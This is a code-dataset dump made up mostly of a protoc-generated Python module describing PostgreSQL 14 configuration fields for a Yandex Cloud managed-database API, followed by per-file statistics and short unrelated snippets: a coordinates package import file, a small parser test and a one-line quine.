_POSTGRESQLCONFIG14.fields_by_name['work_mem'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['maintenance_work_mem'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_work_mem'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['temp_file_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['vacuum_cost_delay'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['vacuum_cost_page_hit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['vacuum_cost_page_miss'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['vacuum_cost_page_dirty'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['vacuum_cost_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['bgwriter_delay'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['bgwriter_lru_maxpages'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['bgwriter_lru_multiplier'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['bgwriter_flush_after'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['backend_flush_after'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['old_snapshot_threshold'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['wal_level'].enum_type = _POSTGRESQLCONFIG14_WALLEVEL
_POSTGRESQLCONFIG14.fields_by_name['synchronous_commit'].enum_type = _POSTGRESQLCONFIG14_SYNCHRONOUSCOMMIT
_POSTGRESQLCONFIG14.fields_by_name['checkpoint_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['checkpoint_completion_target'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['checkpoint_flush_after'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['max_wal_size'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['min_wal_size'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['max_standby_streaming_delay'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['default_statistics_target'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['constraint_exclusion'].enum_type = _POSTGRESQLCONFIG14_CONSTRAINTEXCLUSION
_POSTGRESQLCONFIG14.fields_by_name['cursor_tuple_fraction'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['from_collapse_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['join_collapse_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['force_parallel_mode'].enum_type = _POSTGRESQLCONFIG14_FORCEPARALLELMODE
_POSTGRESQLCONFIG14.fields_by_name['client_min_messages'].enum_type = _POSTGRESQLCONFIG14_LOGLEVEL
_POSTGRESQLCONFIG14.fields_by_name['log_min_messages'].enum_type = _POSTGRESQLCONFIG14_LOGLEVEL
_POSTGRESQLCONFIG14.fields_by_name['log_min_error_statement'].enum_type = _POSTGRESQLCONFIG14_LOGLEVEL
_POSTGRESQLCONFIG14.fields_by_name['log_min_duration_statement'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['log_checkpoints'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['log_connections'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['log_disconnections'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['log_duration'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['log_error_verbosity'].enum_type = _POSTGRESQLCONFIG14_LOGERRORVERBOSITY
_POSTGRESQLCONFIG14.fields_by_name['log_lock_waits'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['log_statement'].enum_type = _POSTGRESQLCONFIG14_LOGSTATEMENT
_POSTGRESQLCONFIG14.fields_by_name['log_temp_files'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['row_security'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['default_transaction_isolation'].enum_type = _POSTGRESQLCONFIG14_TRANSACTIONISOLATION
_POSTGRESQLCONFIG14.fields_by_name['statement_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['lock_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['idle_in_transaction_session_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['bytea_output'].enum_type = _POSTGRESQLCONFIG14_BYTEAOUTPUT
_POSTGRESQLCONFIG14.fields_by_name['xmlbinary'].enum_type = _POSTGRESQLCONFIG14_XMLBINARY
_POSTGRESQLCONFIG14.fields_by_name['xmloption'].enum_type = _POSTGRESQLCONFIG14_XMLOPTION
_POSTGRESQLCONFIG14.fields_by_name['gin_pending_list_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['deadlock_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['max_locks_per_transaction'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['max_pred_locks_per_transaction'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['array_nulls'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['backslash_quote'].enum_type = _POSTGRESQLCONFIG14_BACKSLASHQUOTE
_POSTGRESQLCONFIG14.fields_by_name['default_with_oids'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['escape_string_warning'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['lo_compat_privileges'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['quote_all_identifiers'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['standard_conforming_strings'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['synchronize_seqscans'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['transform_null_equals'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['exit_on_error'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['seq_page_cost'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['random_page_cost'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_max_workers'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_cost_delay'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_cost_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_naptime'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['archive_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['track_activity_query_size'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_bitmapscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_hashagg'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_hashjoin'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_indexscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_indexonlyscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_material'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_mergejoin'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_nestloop'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_seqscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_sort'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_tidscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['max_worker_processes'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['max_parallel_workers'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['max_parallel_workers_per_gather'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_scale_factor'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_analyze_scale_factor'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['default_transaction_read_only'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_parallel_append'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_parallel_hash'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_partition_pruning'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_partitionwise_aggregate'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_partitionwise_join'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['jit'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['max_parallel_maintenance_workers'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['parallel_leader_participation'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['log_transaction_sample_rate'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['plan_cache_mode'].enum_type = _POSTGRESQLCONFIG14_PLANCACHEMODE
_POSTGRESQLCONFIG14.fields_by_name['effective_io_concurrency'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['effective_cache_size'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['shared_preload_libraries'].enum_type = _POSTGRESQLCONFIG14_SHAREDPRELOADLIBRARIES
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_log_min_duration'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_log_analyze'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_log_buffers'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_log_timing'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_log_triggers'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_log_verbose'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_log_nested_statements'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_sample_rate'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['pg_hint_plan_enable_hint'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['pg_hint_plan_enable_hint_table'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['pg_hint_plan_debug_print'].enum_type = _POSTGRESQLCONFIG14_PGHINTPLANDEBUGPRINT
_POSTGRESQLCONFIG14.fields_by_name['pg_hint_plan_message_level'].enum_type = _POSTGRESQLCONFIG14_LOGLEVEL
_POSTGRESQLCONFIG14.fields_by_name['hash_mem_multiplier'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['logical_decoding_work_mem'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['maintenance_io_concurrency'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['max_slot_wal_keep_size'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['wal_keep_size'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_incremental_sort'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_insert_threshold'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_insert_scale_factor'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['log_min_duration_sample'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['log_statement_sample_rate'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['log_parameter_max_length'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['log_parameter_max_length_on_error'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['client_connection_check_interval'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_async_append'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_gathermerge'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_memoize'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['log_recovery_conflict_waits'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['vacuum_failsafe_age'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['vacuum_multixact_failsafe_age'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['pg_qualstats_enabled'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['pg_qualstats_track_constants'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['pg_qualstats_max'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['pg_qualstats_resolve_oids'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['pg_qualstats_sample_rate'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14_WALLEVEL.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_SYNCHRONOUSCOMMIT.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_CONSTRAINTEXCLUSION.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_FORCEPARALLELMODE.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_LOGLEVEL.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_LOGERRORVERBOSITY.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_LOGSTATEMENT.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_TRANSACTIONISOLATION.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_BYTEAOUTPUT.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_XMLBINARY.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_XMLOPTION.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_BACKSLASHQUOTE.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_PLANCACHEMODE.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_PGHINTPLANDEBUGPRINT.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_SHAREDPRELOADLIBRARIES.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIGSET14.fields_by_name['effective_config'].message_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIGSET14.fields_by_name['user_config'].message_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIGSET14.fields_by_name['default_config'].message_type = _POSTGRESQLCONFIG14
DESCRIPTOR.message_types_by_name['PostgresqlConfig14'] = _POSTGRESQLCONFIG14
DESCRIPTOR.message_types_by_name['PostgresqlConfigSet14'] = _POSTGRESQLCONFIGSET14
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PostgresqlConfig14 = _reflection.GeneratedProtocolMessageType('PostgresqlConfig14', (_message.Message,), {
'DESCRIPTOR' : _POSTGRESQLCONFIG14,
'__module__' : 'yandex.cloud.mdb.postgresql.v1.config.postgresql14_pb2'
# @@protoc_insertion_point(class_scope:yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14)
})
_sym_db.RegisterMessage(PostgresqlConfig14)
PostgresqlConfigSet14 = _reflection.GeneratedProtocolMessageType('PostgresqlConfigSet14', (_message.Message,), {
'DESCRIPTOR' : _POSTGRESQLCONFIGSET14,
'__module__' : 'yandex.cloud.mdb.postgresql.v1.config.postgresql14_pb2'
# @@protoc_insertion_point(class_scope:yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfigSet14)
})
_sym_db.RegisterMessage(PostgresqlConfigSet14)
DESCRIPTOR._options = None
_POSTGRESQLCONFIG14.fields_by_name['bgwriter_delay']._options = None
_POSTGRESQLCONFIG14.fields_by_name['bgwriter_flush_after']._options = None
_POSTGRESQLCONFIG14.fields_by_name['backend_flush_after']._options = None
_POSTGRESQLCONFIG14.fields_by_name['old_snapshot_threshold']._options = None
_POSTGRESQLCONFIG14.fields_by_name['checkpoint_timeout']._options = None
_POSTGRESQLCONFIG14.fields_by_name['checkpoint_flush_after']._options = None
_POSTGRESQLCONFIG14.fields_by_name['from_collapse_limit']._options = None
_POSTGRESQLCONFIG14.fields_by_name['join_collapse_limit']._options = None
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_max_workers']._options = None
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_cost_delay']._options = None
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_cost_limit']._options = None
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_naptime']._options = None
_POSTGRESQLCONFIG14.fields_by_name['archive_timeout']._options = None
_POSTGRESQLCONFIG14.fields_by_name['track_activity_query_size']._options = None
_POSTGRESQLCONFIG14.fields_by_name['max_worker_processes']._options = None
_POSTGRESQLCONFIG14.fields_by_name['max_parallel_workers']._options = None
_POSTGRESQLCONFIG14.fields_by_name['max_parallel_workers_per_gather']._options = None
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_scale_factor']._options = None
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_analyze_scale_factor']._options = None
_POSTGRESQLCONFIG14.fields_by_name['max_parallel_maintenance_workers']._options = None
_POSTGRESQLCONFIG14.fields_by_name['log_transaction_sample_rate']._options = None
_POSTGRESQLCONFIG14.fields_by_name['effective_io_concurrency']._options = None
_POSTGRESQLCONFIG14.fields_by_name['effective_cache_size']._options = None
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_log_min_duration']._options = None
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_sample_rate']._options = None
_POSTGRESQLCONFIG14.fields_by_name['hash_mem_multiplier']._options = None
_POSTGRESQLCONFIG14.fields_by_name['logical_decoding_work_mem']._options = None
_POSTGRESQLCONFIG14.fields_by_name['maintenance_io_concurrency']._options = None
_POSTGRESQLCONFIG14.fields_by_name['max_slot_wal_keep_size']._options = None
_POSTGRESQLCONFIG14.fields_by_name['wal_keep_size']._options = None
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_insert_threshold']._options = None
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_insert_scale_factor']._options = None
_POSTGRESQLCONFIG14.fields_by_name['log_min_duration_sample']._options = None
_POSTGRESQLCONFIG14.fields_by_name['log_statement_sample_rate']._options = None
_POSTGRESQLCONFIG14.fields_by_name['log_parameter_max_length']._options = None
_POSTGRESQLCONFIG14.fields_by_name['log_parameter_max_length_on_error']._options = None
_POSTGRESQLCONFIG14.fields_by_name['client_connection_check_interval']._options = None
_POSTGRESQLCONFIG14.fields_by_name['vacuum_failsafe_age']._options = None
_POSTGRESQLCONFIG14.fields_by_name['vacuum_multixact_failsafe_age']._options = None
# @@protoc_insertion_point(module_scope)
| 70.430585
| 18,755
| 0.80003
| 17,768
| 134,945
| 5.695801
| 0.046038
| 0.04158
| 0.081668
| 0.062696
| 0.832159
| 0.813751
| 0.802407
| 0.790243
| 0.760481
| 0.724445
| 0
| 0.060528
| 0.094883
| 134,945
| 1,915
| 18,756
| 70.467363
| 0.768047
| 0.003275
| 0
| 0.614072
| 1
| 0.001599
| 0.265594
| 0.236841
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003198
| 0
| 0.003198
| 0.001599
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ffcdeb5a8723b51b7f2b87ea504bcd6df4d94287
| 250
|
py
|
Python
|
africanus/coordinates/__init__.py
|
JoshVStaden/codex-africanus
|
4a38994431d51510b1749fa0e4b8b6190b8b530f
|
[
"BSD-3-Clause"
] | 13
|
2018-04-06T09:36:13.000Z
|
2021-04-13T13:11:00.000Z
|
africanus/coordinates/__init__.py
|
JoshVStaden/codex-africanus
|
4a38994431d51510b1749fa0e4b8b6190b8b530f
|
[
"BSD-3-Clause"
] | 153
|
2018-03-28T14:13:48.000Z
|
2022-02-03T07:49:17.000Z
|
africanus/coordinates/__init__.py
|
JoshVStaden/codex-africanus
|
4a38994431d51510b1749fa0e4b8b6190b8b530f
|
[
"BSD-3-Clause"
] | 14
|
2018-03-29T13:30:52.000Z
|
2021-06-12T02:56:55.000Z
|
# flake8: noqa
from africanus.coordinates.coordinates import radec_to_lmn
from africanus.coordinates.coordinates import radec_to_lm
from africanus.coordinates.coordinates import lmn_to_radec
from africanus.coordinates.coordinates import lm_to_radec
| 35.714286
| 58
| 0.88
| 34
| 250
| 6.235294
| 0.294118
| 0.245283
| 0.45283
| 0.660377
| 0.839623
| 0.45283
| 0.45283
| 0
| 0
| 0
| 0
| 0.004348
| 0.08
| 250
| 6
| 59
| 41.666667
| 0.917391
| 0.048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ffcfd5d7cc8ba6863f96220d3693bb54eb89d208
| 79
|
py
|
Python
|
tests/parser/good/simple-comment.py
|
Nakrez/RePy
|
057db55a99eac2c5cb3d622fa1f2e29f6083d8d6
|
[
"MIT"
] | 1
|
2020-11-24T05:24:26.000Z
|
2020-11-24T05:24:26.000Z
|
tests/parser/good/simple-comment.py
|
Nakrez/RePy
|
057db55a99eac2c5cb3d622fa1f2e29f6083d8d6
|
[
"MIT"
] | null | null | null |
tests/parser/good/simple-comment.py
|
Nakrez/RePy
|
057db55a99eac2c5cb3d622fa1f2e29f6083d8d6
|
[
"MIT"
] | null | null | null |
# function my_fun
def myfun():
# return 1
return 1
# call myfun
myfun()
| 9.875
| 17
| 0.632911
| 12
| 79
| 4.083333
| 0.666667
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034483
| 0.265823
| 79
| 7
| 18
| 11.285714
| 0.810345
| 0.443038
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0
| 0.333333
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
0808adf9323664303df19a9f8cecc9fd04f8491a
| 32
|
py
|
Python
|
archive/p/python/quine.py
|
Ayush7-BIT/sample-programs
|
827d8961d3a548daf8fe3b674642a1562daaa5c4
|
[
"MIT"
] | 422
|
2018-08-14T11:57:47.000Z
|
2022-03-07T23:54:34.000Z
|
archive/p/python/quine.py
|
Ayush7-BIT/sample-programs
|
827d8961d3a548daf8fe3b674642a1562daaa5c4
|
[
"MIT"
] | 1,498
|
2018-08-10T19:18:52.000Z
|
2021-12-14T03:02:00.000Z
|
archive/p/python/quine.py
|
Ayush7-BIT/sample-programs
|
827d8961d3a548daf8fe3b674642a1562daaa5c4
|
[
"MIT"
] | 713
|
2018-08-12T21:37:49.000Z
|
2022-03-02T22:57:21.000Z
|
s='s=%r;print(s%%s)';print(s%s)
| 16
| 31
| 0.53125
| 9
| 32
| 1.888889
| 0.333333
| 0.352941
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03125
